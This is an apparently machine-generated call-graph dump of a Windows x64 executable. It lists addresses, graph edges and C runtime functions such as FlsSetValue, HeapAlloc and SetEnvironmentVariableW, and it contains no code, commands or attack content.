7ff62c0fc550 _log10_special 8 API calls 18370->18372 18375 7ff62c0f7eb5 18371->18375 18373 7ff62c0f7f83 18372->18373 18373->17277 18374 7ff62c0f1c80 49 API calls 18374->18375 18375->18370 18375->18374 18376 7ff62c0f4560 10 API calls 18375->18376 18377 7ff62c0f9390 2 API calls 18375->18377 18376->18375 18378 7ff62c0f7f23 CreateDirectoryW 18377->18378 18378->18370 18378->18375 18380 7ff62c0f1613 18379->18380 18381 7ff62c0f1637 18379->18381 18500 7ff62c0f1050 18380->18500 18383 7ff62c0f45c0 108 API calls 18381->18383 18385 7ff62c0f164b 18383->18385 18384 7ff62c0f1618 18386 7ff62c0f162e 18384->18386 18390 7ff62c0f2710 54 API calls 18384->18390 18387 7ff62c0f1682 18385->18387 18388 7ff62c0f1653 18385->18388 18386->17277 18389 7ff62c0f45c0 108 API calls 18387->18389 18391 7ff62c104f08 _get_daylight 11 API calls 18388->18391 18392 7ff62c0f1696 18389->18392 18390->18386 18393 7ff62c0f1658 18391->18393 18394 7ff62c0f169e 18392->18394 18395 7ff62c0f16b8 18392->18395 18396 7ff62c0f2910 54 API calls 18393->18396 18398 7ff62c0f2710 54 API calls 18394->18398 18399 7ff62c1006d4 73 API calls 18395->18399 18397 7ff62c0f1671 18396->18397 18397->17277 18400 7ff62c0f16ae 18398->18400 18401 7ff62c0f16cd 18399->18401 18406 7ff62c10004c 74 API calls 18400->18406 18402 7ff62c0f16d1 18401->18402 18403 7ff62c0f16f9 18401->18403 18407 7ff62c104f08 _get_daylight 11 API calls 18402->18407 18404 7ff62c0f16ff 18403->18404 18405 7ff62c0f1717 18403->18405 18478 7ff62c0f1210 18404->18478 18412 7ff62c0f1739 18405->18412 18422 7ff62c0f1761 18405->18422 18409 7ff62c0f1829 18406->18409 18410 7ff62c0f16d6 18407->18410 18409->17277 18411 7ff62c0f2910 54 API calls 18410->18411 18418 7ff62c0f16ef __std_exception_destroy 18411->18418 18414 7ff62c104f08 _get_daylight 11 API calls 18412->18414 18413 7ff62c10004c 74 API calls 18413->18400 18415 7ff62c0f173e 18414->18415 18416 7ff62c0f2910 54 API calls 18415->18416 18416->18418 18417 7ff62c10039c _fread_nolock 53 API calls 18417->18422 18418->18413 18419 7ff62c0f17da 18421 7ff62c104f08 _get_daylight 11 API calls 18419->18421 18423 7ff62c0f17ca 18421->18423 18422->18417 18422->18418 18422->18419 18424 7ff62c0f17c5 18422->18424 18531 7ff62c100adc 18422->18531 18425 7ff62c104f08 _get_daylight 11 API calls 18424->18425 18425->18423 18428 7ff62c0f718b 18427->18428 18430 7ff62c0f7144 18427->18430 18428->17277 18430->18428 18564 7ff62c105024 18430->18564 18432 7ff62c0f41a1 18431->18432 18433 7ff62c0f44e0 49 API calls 18432->18433 18434 7ff62c0f41db 18433->18434 18435 7ff62c0f44e0 49 API calls 18434->18435 18436 7ff62c0f41eb 18435->18436 18437 7ff62c0f423c 18436->18437 18438 7ff62c0f420d 18436->18438 18440 7ff62c0f4110 51 API calls 18437->18440 18579 7ff62c0f4110 18438->18579 18441 7ff62c0f423a 18440->18441 18442 7ff62c0f429c 18441->18442 18443 7ff62c0f4267 18441->18443 18444 7ff62c0f4110 51 API calls 18442->18444 18586 7ff62c0f7cf0 18443->18586 18446 7ff62c0f42c0 18444->18446 18449 7ff62c0f4110 51 API calls 18446->18449 18451 7ff62c0f4312 18446->18451 18448 7ff62c0f4297 18455 7ff62c0fc550 _log10_special 8 API calls 18448->18455 18453 7ff62c0f42e9 18449->18453 18450 7ff62c0f4393 18454 7ff62c0f1950 115 API calls 18450->18454 18451->18450 18460 7ff62c0f438c 18451->18460 18463 7ff62c0f4317 18451->18463 18465 7ff62c0f437b 18451->18465 18453->18451 18458 7ff62c0f4110 51 API calls 18453->18458 18457 7ff62c0f439d 18454->18457 18459 7ff62c0f43fe 18457->18459 18462 7ff62c0f43a5 18457->18462 18458->18451 18460->18462 18460->18463 18612 7ff62c0f1840 18462->18612 18468 7ff62c0f2710 54 API calls 18463->18468 18467 7ff62c0f2710 54 API calls 18465->18467 18467->18463 18468->18448 18476 7ff62c0f1c80 49 API calls 18475->18476 18477 7ff62c0f4474 18476->18477 18477->17277 18479 7ff62c0f1268 18478->18479 18480 7ff62c0f126f 18479->18480 18481 7ff62c0f1297 18479->18481 18482 7ff62c0f2710 54 API calls 18480->18482 18484 7ff62c0f12d4 18481->18484 18485 7ff62c0f12b1 18481->18485 18501 7ff62c0f45c0 108 API calls 18500->18501 18502 7ff62c0f108c 18501->18502 18503 7ff62c0f1094 18502->18503 18504 7ff62c0f10a9 18502->18504 18506 7ff62c0f2710 54 API calls 18503->18506 18505 7ff62c1006d4 73 API calls 18504->18505 18507 7ff62c0f10bf 18505->18507 18512 7ff62c0f10a4 __std_exception_destroy 18506->18512 18508 7ff62c0f10c3 18507->18508 18509 7ff62c0f10e6 18507->18509 18510 7ff62c104f08 _get_daylight 11 API calls 18508->18510 18514 7ff62c0f1122 18509->18514 18515 7ff62c0f10f7 18509->18515 18511 7ff62c0f10c8 18510->18511 18513 7ff62c0f2910 54 API calls 18511->18513 18512->18384 18521 7ff62c0f10e1 __std_exception_destroy 18513->18521 18516 7ff62c0f1129 18514->18516 18525 7ff62c0f113c 18514->18525 18517 7ff62c104f08 _get_daylight 11 API calls 18515->18517 18518 7ff62c0f1210 92 API calls 18516->18518 18519 7ff62c0f1100 18517->18519 18518->18521 18522 7ff62c0f2910 54 API calls 18519->18522 18520 7ff62c10004c 74 API calls 18523 7ff62c0f11b4 18520->18523 18521->18520 18522->18521 18523->18512 18535 7ff62c0f46f0 18523->18535 18524 7ff62c10039c _fread_nolock 53 API calls 18524->18525 18525->18521 18525->18524 18527 7ff62c0f11ed 18525->18527 18528 7ff62c104f08 _get_daylight 11 API calls 18527->18528 18529 7ff62c0f11f2 18528->18529 18530 7ff62c0f2910 54 API calls 18529->18530 18530->18521 18532 7ff62c100b0c 18531->18532 18549 7ff62c10082c 18532->18549 18536 7ff62c0f4700 18535->18536 18565 7ff62c105031 18564->18565 18566 7ff62c10505e 18564->18566 18567 7ff62c104f08 _get_daylight 11 API calls 18565->18567 18575 7ff62c104fe8 18565->18575 18568 7ff62c105081 18566->18568 18569 7ff62c10509d 18566->18569 18570 7ff62c10503b 18567->18570 18571 7ff62c104f08 _get_daylight 11 API calls 18568->18571 18573 7ff62c104f4c 45 API calls 18569->18573 18574 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18570->18574 18572 7ff62c105086 18571->18572 18576 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18572->18576 18577 7ff62c105091 18573->18577 18578 7ff62c105046 18574->18578 18575->18430 18576->18577 18577->18430 18578->18430 18580 7ff62c0f4136 18579->18580 18581 7ff62c104984 49 API calls 18580->18581 18582 7ff62c0f415c 18581->18582 18583 7ff62c0f416d 18582->18583 18584 7ff62c0f4560 10 API calls 18582->18584 18583->18441 18585 7ff62c0f417f 18584->18585 18585->18441 18587 7ff62c0f7d05 18586->18587 18588 7ff62c0f45c0 108 API calls 18587->18588 18589 7ff62c0f7d2b 18588->18589 18590 7ff62c0f45c0 108 API calls 18589->18590 18602 7ff62c0f7d52 18589->18602 18591 7ff62c0f7d42 18590->18591 18593 7ff62c0f7d5c 18591->18593 18594 7ff62c0f7d4d 18591->18594 18592 7ff62c0fc550 _log10_special 8 API calls 18595 7ff62c0f4277 18592->18595 18595->18448 18602->18592 18643 7ff62c105ec8 18642->18643 18644 7ff62c105eee 18643->18644 18647 7ff62c105f21 18643->18647 18645 7ff62c104f08 _get_daylight 11 API calls 18644->18645 18646 7ff62c105ef3 18645->18646 18648 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18646->18648 18649 7ff62c105f34 18647->18649 18650 7ff62c105f27 18647->18650 18654 7ff62c0f4616 18648->18654 18661 7ff62c10ac28 18649->18661 18652 7ff62c104f08 _get_daylight 11 API calls 18650->18652 18652->18654 18654->17303 18674 7ff62c1102d8 EnterCriticalSection 18661->18674 19034 7ff62c1078f8 19033->19034 19037 7ff62c1073d4 19034->19037 19036 7ff62c107911 19036->17313 19038 7ff62c1073ef 19037->19038 19039 7ff62c10741e 19037->19039 19040 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 19038->19040 19047 7ff62c10546c EnterCriticalSection 19039->19047 19042 7ff62c10740f 19040->19042 19042->19036 19049 7ff62c0ffe43 19048->19049 19050 7ff62c0ffe71 19048->19050 19051 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 19049->19051 19057 7ff62c0ffe63 19050->19057 19058 7ff62c10546c EnterCriticalSection 19050->19058 19051->19057 19057->17317 19060 7ff62c0f45c0 108 API calls 19059->19060 19061 7ff62c0f1493 19060->19061 19062 7ff62c0f14bc 19061->19062 19063 7ff62c0f149b 19061->19063 19065 7ff62c1006d4 73 API calls 19062->19065 19064 7ff62c0f2710 54 API calls 19063->19064 19066 7ff62c0f14ab 19064->19066 19067 7ff62c0f14d1 19065->19067 19066->17350 19068 7ff62c0f14d5 19067->19068 19069 7ff62c0f14f8 19067->19069 19070 7ff62c104f08 _get_daylight 11 API calls 19068->19070 19072 7ff62c0f1532 19069->19072 19073 7ff62c0f1508 19069->19073 19071 7ff62c0f14da 19070->19071 19074 7ff62c0f2910 54 API calls 19071->19074 19076 7ff62c0f1538 19072->19076 19084 7ff62c0f154b 19072->19084 19075 7ff62c104f08 _get_daylight 11 API calls 19073->19075 19081 7ff62c0f14f3 __std_exception_destroy 19074->19081 19077 7ff62c0f1510 19075->19077 19078 7ff62c0f1210 92 API calls 19076->19078 19079 7ff62c0f2910 54 API calls 19077->19079 19078->19081 19079->19081 19080 7ff62c10004c 74 API calls 19082 7ff62c0f15c4 19080->19082 19081->19080 19082->17350 19083 7ff62c10039c _fread_nolock 53 API calls 19083->19084 19084->19081 19084->19083 19085 7ff62c0f15d6 19084->19085 19086 7ff62c104f08 _get_daylight 11 API calls 19085->19086 19087 7ff62c0f15db 19086->19087 19088 7ff62c0f2910 54 API calls 19087->19088 19088->19081 19090 7ff62c0f9390 2 API calls 19089->19090 19166 7ff62c0f6375 19165->19166 19167 7ff62c0f1c80 49 API calls 19166->19167 19168 7ff62c0f63b1 19167->19168 19169 7ff62c0f63dd 19168->19169 19170 7ff62c0f63ba 19168->19170 19172 7ff62c0f4630 49 API calls 19169->19172 19171 7ff62c0f2710 54 API calls 19170->19171 19188 7ff62c0f63d3 19171->19188 19173 7ff62c0f63f5 19172->19173 19174 7ff62c0f6413 19173->19174 19175 7ff62c0f2710 54 API calls 19173->19175 19176 7ff62c0f4560 10 API calls 19174->19176 19175->19174 19178 7ff62c0f641d 19176->19178 19177 7ff62c0fc550 _log10_special 8 API calls 19179 7ff62c0f336e 19177->19179 19180 7ff62c0f642b 19178->19180 19181 7ff62c0f8e80 3 API calls 19178->19181 19179->17424 19196 7ff62c0f6500 19179->19196 19182 7ff62c0f4630 49 API calls 19180->19182 19181->19180 19183 7ff62c0f6444 19182->19183 19184 7ff62c0f6469 19183->19184 19185 7ff62c0f6449 19183->19185 19187 7ff62c0f8e80 3 API calls 19184->19187 19186 7ff62c0f2710 54 API calls 19185->19186 19186->19188 19189 7ff62c0f6476 19187->19189 19188->19177 19345 7ff62c0f5400 19196->19345 19198 7ff62c0f6526 19199 7ff62c0f652e 19198->19199 19200 7ff62c0f653f 19198->19200 19201 7ff62c0f2710 54 API calls 19199->19201 19352 7ff62c0f4c90 19200->19352 19207 7ff62c0f653a 19201->19207 19347 7ff62c0f542c 19345->19347 19346 7ff62c0f5434 19346->19198 19347->19346 19350 7ff62c0f55d4 19347->19350 19376 7ff62c106aa4 19347->19376 19348 7ff62c0f5797 __std_exception_destroy 19348->19198 19349 7ff62c0f47d0 47 API calls 19349->19350 19350->19348 19350->19349 19353 7ff62c0f4cc0 19352->19353 19377 7ff62c106ad4 19376->19377 19380 7ff62c105fa0 19377->19380 19381 7ff62c105fe3 19380->19381 19382 7ff62c105fd1 19380->19382 19438->17427 19440 7ff62c10b150 __GetCurrentState 45 API calls 19439->19440 19441 7ff62c10a3e1 19440->19441 19442 7ff62c10a504 __GetCurrentState 45 API calls 19441->19442 19443 7ff62c10a401 19442->19443 16036 7ff62c1108c8 16037 7ff62c1108ec 16036->16037 16040 7ff62c1108fc 16036->16040 16187 7ff62c104f08 16037->16187 16039 7ff62c110bdc 16042 7ff62c104f08 _get_daylight 11 API calls 16039->16042 16040->16039 16041 7ff62c11091e 16040->16041 16043 7ff62c11093f 16041->16043 16190 7ff62c110f84 16041->16190 16044 7ff62c110be1 16042->16044 16047 7ff62c1109b1 16043->16047 16049 7ff62c110965 16043->16049 16054 7ff62c1109a5 16043->16054 16046 7ff62c10a948 __free_lconv_mon 11 API calls 16044->16046 16058 7ff62c1108f1 16046->16058 16051 7ff62c10eb98 _get_daylight 11 API calls 16047->16051 16068 7ff62c110974 16047->16068 16048 7ff62c110a5e 16057 7ff62c110a7b 16048->16057 16065 7ff62c110acd 16048->16065 16205 7ff62c1096c0 16049->16205 16055 7ff62c1109c7 16051->16055 16054->16048 16054->16068 16217 7ff62c11712c 16054->16217 16059 7ff62c10a948 __free_lconv_mon 11 API calls 16055->16059 16062 7ff62c10a948 __free_lconv_mon 11 API calls 16057->16062 16063 7ff62c1109d5 16059->16063 16060 7ff62c11098d 16060->16054 16067 7ff62c110f84 45 API calls 16060->16067 16061 7ff62c11096f 16064 7ff62c104f08 _get_daylight 11 API calls 16061->16064 16066 7ff62c110a84 16062->16066 16063->16054 16063->16068 16071 7ff62c10eb98 _get_daylight 11 API calls 16063->16071 16064->16068 16065->16068 16069 7ff62c1133dc 40 API calls 16065->16069 16077 7ff62c110a89 16066->16077 16253 7ff62c1133dc 16066->16253 16067->16054 16211 7ff62c10a948 16068->16211 16070 7ff62c110b0a 16069->16070 16073 7ff62c10a948 __free_lconv_mon 11 API calls 16070->16073 16072 7ff62c1109f7 16071->16072 16075 7ff62c10a948 __free_lconv_mon 11 API calls 16072->16075 16076 7ff62c110b14 16073->16076 16075->16054 16076->16068 16076->16077 16078 7ff62c110bd0 16077->16078 16167 7ff62c10eb98 16077->16167 16080 7ff62c10a948 __free_lconv_mon 11 API calls 16078->16080 16079 7ff62c110ab5 16081 7ff62c10a948 __free_lconv_mon 11 API calls 16079->16081 16080->16058 16081->16077 16084 7ff62c110b69 16174 7ff62c10a4a4 16084->16174 16085 7ff62c110b60 16087 7ff62c10a948 __free_lconv_mon 11 API calls 16085->16087 16088 7ff62c110b67 16087->16088 16094 7ff62c10a948 __free_lconv_mon 11 API calls 16088->16094 16090 7ff62c110c0b 16183 7ff62c10a900 IsProcessorFeaturePresent 16090->16183 16091 7ff62c110b80 16262 7ff62c117244 16091->16262 16094->16058 16097 7ff62c110ba7 16101 7ff62c104f08 _get_daylight 11 API calls 16097->16101 16098 7ff62c110bc8 16100 7ff62c10a948 __free_lconv_mon 11 API calls 16098->16100 16100->16078 16103 7ff62c110bac 16101->16103 16107 7ff62c10a948 __free_lconv_mon 11 API calls 16103->16107 16107->16088 16168 7ff62c10eba9 _get_daylight 16167->16168 16169 7ff62c10ebfa 16168->16169 16170 7ff62c10ebde HeapAlloc 16168->16170 16281 7ff62c113590 16168->16281 16172 7ff62c104f08 _get_daylight 10 API calls 16169->16172 16170->16168 16171 7ff62c10ebf8 16170->16171 16171->16084 16171->16085 16172->16171 16175 7ff62c10a4bb 16174->16175 16176 7ff62c10a4b1 16174->16176 16177 7ff62c104f08 _get_daylight 11 API calls 16175->16177 16176->16175 16179 7ff62c10a4d6 16176->16179 16182 7ff62c10a4c2 16177->16182 16180 7ff62c10a4ce 16179->16180 16181 7ff62c104f08 _get_daylight 11 API calls 16179->16181 16180->16090 16180->16091 16181->16182 16290 7ff62c10a8e0 16182->16290 16184 7ff62c10a913 16183->16184 16352 7ff62c10a614 16184->16352 16374 7ff62c10b2c8 GetLastError 16187->16374 16189 7ff62c104f11 16189->16058 16191 7ff62c110fb9 16190->16191 16198 7ff62c110fa1 16190->16198 16192 7ff62c10eb98 _get_daylight 11 API calls 16191->16192 16201 7ff62c110fdd 16192->16201 16193 7ff62c111062 16391 7ff62c10a504 16193->16391 16195 7ff62c11103e 16197 7ff62c10a948 __free_lconv_mon 11 API calls 16195->16197 16197->16198 16198->16043 16199 7ff62c10eb98 _get_daylight 11 API calls 16199->16201 16200 7ff62c10a948 __free_lconv_mon 11 API calls 16200->16201 16201->16193 16201->16195 16201->16199 16201->16200 16202 7ff62c10a4a4 __std_exception_copy 37 API calls 16201->16202 16203 7ff62c11104d 16201->16203 16202->16201 16204 7ff62c10a900 _isindst 17 API calls 16203->16204 16204->16193 16206 7ff62c1096d0 16205->16206 16209 7ff62c1096d9 16205->16209 16206->16209 16457 7ff62c109198 16206->16457 16209->16060 16209->16061 16212 7ff62c10a94d RtlFreeHeap 16211->16212 16214 7ff62c10a97c 16211->16214 16213 7ff62c10a968 GetLastError 16212->16213 16212->16214 16215 7ff62c10a975 __free_lconv_mon 16213->16215 16214->16058 16216 7ff62c104f08 _get_daylight 9 API calls 16215->16216 16216->16214 16218 7ff62c117139 16217->16218 16219 7ff62c116254 16217->16219 16221 7ff62c104f4c 45 API calls 16218->16221 16220 7ff62c116261 16219->16220 16226 7ff62c116297 16219->16226 16224 7ff62c104f08 _get_daylight 11 API calls 16220->16224 16228 7ff62c116208 16220->16228 16223 7ff62c11716d 16221->16223 16222 7ff62c1162c1 16225 7ff62c104f08 _get_daylight 11 API calls 16222->16225 16230 7ff62c117183 16223->16230 16234 7ff62c11719a 16223->16234 16248 7ff62c117172 16223->16248 16227 7ff62c11626b 16224->16227 16229 7ff62c1162c6 16225->16229 16226->16222 16231 7ff62c1162e6 16226->16231 16232 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16227->16232 16228->16054 16233 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16229->16233 16235 7ff62c104f08 _get_daylight 11 API calls 16230->16235 16238 7ff62c104f4c 45 API calls 16231->16238 16244 7ff62c1162d1 16231->16244 16236 7ff62c116276 16232->16236 16233->16244 16239 7ff62c1171b6 16234->16239 16240 7ff62c1171a4 16234->16240 16237 7ff62c117188 16235->16237 16236->16054 16243 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16237->16243 16238->16244 16241 7ff62c1171c7 16239->16241 16242 7ff62c1171de 16239->16242 16245 7ff62c104f08 _get_daylight 11 API calls 16240->16245 16750 7ff62c1162a4 16241->16750 16759 7ff62c118f4c 16242->16759 16243->16248 16244->16054 16249 7ff62c1171a9 16245->16249 16248->16054 16250 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16249->16250 16250->16248 16252 7ff62c104f08 _get_daylight 11 API calls 16252->16248 16254 7ff62c11341b 16253->16254 16255 7ff62c1133fe 16253->16255 16257 7ff62c113425 16254->16257 16799 7ff62c117c38 16254->16799 16255->16254 16256 7ff62c11340c 16255->16256 16258 7ff62c104f08 _get_daylight 11 API calls 16256->16258 16806 7ff62c117c74 16257->16806 16260 7ff62c113411 memcpy_s 16258->16260 16260->16079 16263 7ff62c104f4c 45 API calls 16262->16263 16264 7ff62c1172aa 16263->16264 16266 7ff62c1172b8 16264->16266 16818 7ff62c10ef24 16264->16818 16821 7ff62c1054ac 16266->16821 16269 7ff62c104f4c 45 API calls 16270 7ff62c117327 16269->16270 16276 7ff62c10ef24 5 API calls 16270->16276 16278 7ff62c117330 16270->16278 16271 7ff62c1173a4 16272 7ff62c1173b5 16271->16272 16273 7ff62c10a948 __free_lconv_mon 11 API calls 16271->16273 16274 7ff62c110ba3 16272->16274 16275 7ff62c10a948 __free_lconv_mon 11 API calls 16272->16275 16273->16272 16274->16097 16274->16098 16275->16274 16276->16278 16277 7ff62c1054ac 14 API calls 16279 7ff62c11738b 16277->16279 16278->16277 16279->16271 16280 7ff62c117393 SetEnvironmentVariableW 16279->16280 16280->16271 16284 7ff62c1135d0 16281->16284 16289 7ff62c1102d8 EnterCriticalSection 16284->16289 16293 7ff62c10a778 16290->16293 16292 7ff62c10a8f9 16292->16180 16294 7ff62c10a7a3 16293->16294 16297 7ff62c10a814 16294->16297 16296 7ff62c10a7ca 16296->16292 16307 7ff62c10a55c 16297->16307 16300 7ff62c10a84f 16300->16296 16303 7ff62c10a900 _isindst 17 API calls 16304 7ff62c10a8df 16303->16304 16305 7ff62c10a778 _invalid_parameter_noinfo 37 API calls 16304->16305 16306 7ff62c10a8f9 16305->16306 16306->16296 16308 7ff62c10a578 GetLastError 16307->16308 16309 7ff62c10a5b3 16307->16309 16310 7ff62c10a588 16308->16310 16309->16300 16313 7ff62c10a5c8 16309->16313 16316 7ff62c10b390 16310->16316 16314 7ff62c10a5fc 16313->16314 16315 7ff62c10a5e4 GetLastError SetLastError 16313->16315 16314->16300 16314->16303 16315->16314 16317 7ff62c10b3ca FlsSetValue 16316->16317 16318 7ff62c10b3af FlsGetValue 16316->16318 16319 7ff62c10b3d7 16317->16319 16320 7ff62c10a5a3 SetLastError 16317->16320 16318->16320 16321 7ff62c10b3c4 16318->16321 16322 7ff62c10eb98 _get_daylight 11 API calls 16319->16322 16320->16309 16321->16317 16323 7ff62c10b3e6 16322->16323 16324 7ff62c10b404 FlsSetValue 16323->16324 16325 7ff62c10b3f4 FlsSetValue 16323->16325 16327 7ff62c10b410 FlsSetValue 16324->16327 16328 7ff62c10b422 16324->16328 16326 7ff62c10b3fd 16325->16326 16329 7ff62c10a948 __free_lconv_mon 11 API calls 16326->16329 16327->16326 16333 7ff62c10aef4 16328->16333 16329->16320 16338 7ff62c10adcc 16333->16338 16350 7ff62c1102d8 EnterCriticalSection 16338->16350 16353 7ff62c10a64e _isindst memcpy_s 16352->16353 16354 7ff62c10a676 RtlCaptureContext RtlLookupFunctionEntry 16353->16354 16355 7ff62c10a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16354->16355 16356 7ff62c10a6b0 RtlVirtualUnwind 16354->16356 16359 7ff62c10a738 _isindst 16355->16359 16356->16355 16360 7ff62c0fc550 16359->16360 16361 7ff62c0fc559 16360->16361 16362 7ff62c0fc564 GetCurrentProcess TerminateProcess 16361->16362 16363 7ff62c0fc8e0 IsProcessorFeaturePresent 16361->16363 16364 7ff62c0fc8f8 16363->16364 16369 7ff62c0fcad8 RtlCaptureContext 16364->16369 16370 7ff62c0fcaf2 RtlLookupFunctionEntry 16369->16370 16371 7ff62c0fc90b 16370->16371 16372 7ff62c0fcb08 RtlVirtualUnwind 16370->16372 16373 7ff62c0fc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16371->16373 16372->16370 16372->16371 16375 7ff62c10b309 FlsSetValue 16374->16375 16381 7ff62c10b2ec 16374->16381 16376 7ff62c10b31b 16375->16376 16380 7ff62c10b2f9 16375->16380 16378 7ff62c10eb98 _get_daylight 5 API calls 16376->16378 16377 7ff62c10b375 SetLastError 16377->16189 16379 7ff62c10b32a 16378->16379 16382 7ff62c10b348 FlsSetValue 16379->16382 16383 7ff62c10b338 FlsSetValue 16379->16383 16380->16377 16381->16375 16381->16380 16385 7ff62c10b366 16382->16385 16386 7ff62c10b354 FlsSetValue 16382->16386 16384 7ff62c10b341 16383->16384 16387 7ff62c10a948 __free_lconv_mon 5 API calls 16384->16387 16388 7ff62c10aef4 _get_daylight 5 API calls 16385->16388 16386->16384 16387->16380 16389 7ff62c10b36e 16388->16389 16390 7ff62c10a948 __free_lconv_mon 5 API calls 16389->16390 16390->16377 16400 7ff62c113650 16391->16400 16426 7ff62c113608 16400->16426 16431 7ff62c1102d8 EnterCriticalSection 16426->16431 16458 7ff62c1091b1 16457->16458 16459 7ff62c1091ad 16457->16459 16480 7ff62c1125f0 16458->16480 16459->16209 16472 7ff62c1094ec 16459->16472 16464 7ff62c1091cf 16506 7ff62c10927c 16464->16506 16465 7ff62c1091c3 16466 7ff62c10a948 __free_lconv_mon 11 API calls 16465->16466 16466->16459 16469 7ff62c10a948 __free_lconv_mon 11 API calls 16470 7ff62c1091f6 16469->16470 16471 7ff62c10a948 __free_lconv_mon 11 API calls 16470->16471 16471->16459 16473 7ff62c109515 16472->16473 16478 7ff62c10952e 16472->16478 16473->16209 16474 7ff62c1107e8 WideCharToMultiByte 16474->16478 16475 7ff62c10eb98 _get_daylight 11 API calls 16475->16478 16476 7ff62c1095be 16477 7ff62c10a948 __free_lconv_mon 11 API calls 16476->16477 16477->16473 16478->16473 16478->16474 16478->16475 16478->16476 16479 7ff62c10a948 __free_lconv_mon 11 API calls 16478->16479 16479->16478 16481 7ff62c1125fd 16480->16481 16485 7ff62c1091b6 16480->16485 16525 7ff62c10b224 16481->16525 16486 7ff62c11292c GetEnvironmentStringsW 16485->16486 16487 7ff62c1091bb 16486->16487 16488 7ff62c11295c 16486->16488 16487->16464 16487->16465 16489 7ff62c1107e8 WideCharToMultiByte 16488->16489 16490 7ff62c1129ad 16489->16490 16491 7ff62c1129b4 FreeEnvironmentStringsW 16490->16491 16492 7ff62c10d5fc _fread_nolock 12 API calls 16490->16492 16491->16487 16493 7ff62c1129c7 16492->16493 16494 7ff62c1129d8 16493->16494 16495 7ff62c1129cf 16493->16495 16497 7ff62c1107e8 WideCharToMultiByte 16494->16497 16496 7ff62c10a948 __free_lconv_mon 11 API calls 16495->16496 16498 7ff62c1129d6 16496->16498 16499 7ff62c1129fb 16497->16499 16498->16491 16500 7ff62c112a09 16499->16500 16501 7ff62c1129ff 16499->16501 16503 7ff62c10a948 __free_lconv_mon 11 API calls 16500->16503 16502 7ff62c10a948 __free_lconv_mon 11 API calls 16501->16502 16504 7ff62c112a07 FreeEnvironmentStringsW 16502->16504 16503->16504 16504->16487 16508 7ff62c1092a1 16506->16508 16507 7ff62c10eb98 _get_daylight 11 API calls 16518 7ff62c1092d7 16507->16518 16508->16507 16509 7ff62c1092df 16510 7ff62c10a948 __free_lconv_mon 11 API calls 16509->16510 16511 7ff62c1091d7 16510->16511 16511->16469 16512 7ff62c109352 16513 7ff62c10a948 __free_lconv_mon 11 API calls 16512->16513 16513->16511 16514 7ff62c10eb98 _get_daylight 11 API calls 16514->16518 16515 7ff62c109341 16744 7ff62c1094a8 16515->16744 16517 7ff62c10a4a4 __std_exception_copy 37 API calls 16517->16518 16518->16509 16518->16512 16518->16514 16518->16515 16518->16517 16520 7ff62c109377 16518->16520 16522 7ff62c10a948 __free_lconv_mon 11 API calls 16518->16522 16523 7ff62c10a900 _isindst 17 API calls 16520->16523 16521 7ff62c10a948 __free_lconv_mon 11 API calls 16521->16509 16522->16518 16524 7ff62c10938a 16523->16524 16526 7ff62c10b250 FlsSetValue 16525->16526 16527 7ff62c10b235 FlsGetValue 16525->16527 16529 7ff62c10b242 16526->16529 16530 7ff62c10b25d 16526->16530 16528 7ff62c10b24a 16527->16528 16527->16529 16528->16526 16531 7ff62c10b248 16529->16531 16532 7ff62c10a504 __GetCurrentState 45 API calls 16529->16532 16533 7ff62c10eb98 _get_daylight 11 API calls 16530->16533 16545 7ff62c1122c4 16531->16545 16534 7ff62c10b2c5 16532->16534 16535 7ff62c10b26c 16533->16535 16536 7ff62c10b28a FlsSetValue 16535->16536 16537 7ff62c10b27a FlsSetValue 16535->16537 16538 7ff62c10b296 FlsSetValue 16536->16538 16539 7ff62c10b2a8 16536->16539 16540 7ff62c10b283 16537->16540 16538->16540 16542 7ff62c10aef4 _get_daylight 11 API calls 16539->16542 16541 7ff62c10a948 __free_lconv_mon 11 API calls 16540->16541 16541->16529 16543 7ff62c10b2b0 16542->16543 16544 7ff62c10a948 __free_lconv_mon 11 API calls 16543->16544 16544->16531 16568 7ff62c112534 16545->16568 16547 7ff62c1122f9 16583 7ff62c111fc4 16547->16583 16552 7ff62c11232f 16553 7ff62c10a948 __free_lconv_mon 11 API calls 16552->16553 16566 7ff62c112316 16553->16566 16554 7ff62c11233e 16554->16554 16597 7ff62c11266c 16554->16597 16557 7ff62c11243a 16558 7ff62c104f08 _get_daylight 11 API calls 16557->16558 16559 7ff62c11243f 16558->16559 16562 7ff62c10a948 __free_lconv_mon 11 API calls 16559->16562 16560 7ff62c112495 16561 7ff62c1124fc 16560->16561 16608 7ff62c111df4 16560->16608 16565 7ff62c10a948 __free_lconv_mon 11 API calls 16561->16565 16562->16566 16563 7ff62c112454 16563->16560 16567 7ff62c10a948 __free_lconv_mon 11 API calls 16563->16567 16565->16566 16566->16485 16567->16560 16569 7ff62c112557 16568->16569 16570 7ff62c112561 16569->16570 16623 7ff62c1102d8 EnterCriticalSection 16569->16623 16572 7ff62c1125d3 16570->16572 16576 7ff62c10a504 __GetCurrentState 45 API calls 16570->16576 16572->16547 16577 7ff62c1125eb 16576->16577 16579 7ff62c112642 16577->16579 16580 7ff62c10b224 50 API calls 16577->16580 16579->16547 16581 7ff62c11262c 16580->16581 16582 7ff62c1122c4 65 API calls 16581->16582 16582->16579 16624 7ff62c104f4c 16583->16624 16586 7ff62c111ff6 16588 7ff62c11200b 16586->16588 16589 7ff62c111ffb GetACP 16586->16589 16587 7ff62c111fe4 GetOEMCP 16587->16588 16588->16566 16590 7ff62c10d5fc 16588->16590 16589->16588 16591 7ff62c10d647 16590->16591 16596 7ff62c10d60b _get_daylight 16590->16596 16593 7ff62c104f08 _get_daylight 11 API calls 16591->16593 16592 7ff62c10d62e HeapAlloc 16594 7ff62c10d645 16592->16594 16592->16596 16593->16594 16594->16552 16594->16554 16595 7ff62c113590 _get_daylight 2 API calls 16595->16596 16596->16591 16596->16592 16596->16595 16598 7ff62c111fc4 47 API calls 16597->16598 16599 7ff62c112699 16598->16599 16600 7ff62c1127ef 16599->16600 16602 7ff62c1126d6 IsValidCodePage 16599->16602 16607 7ff62c1126f0 memcpy_s 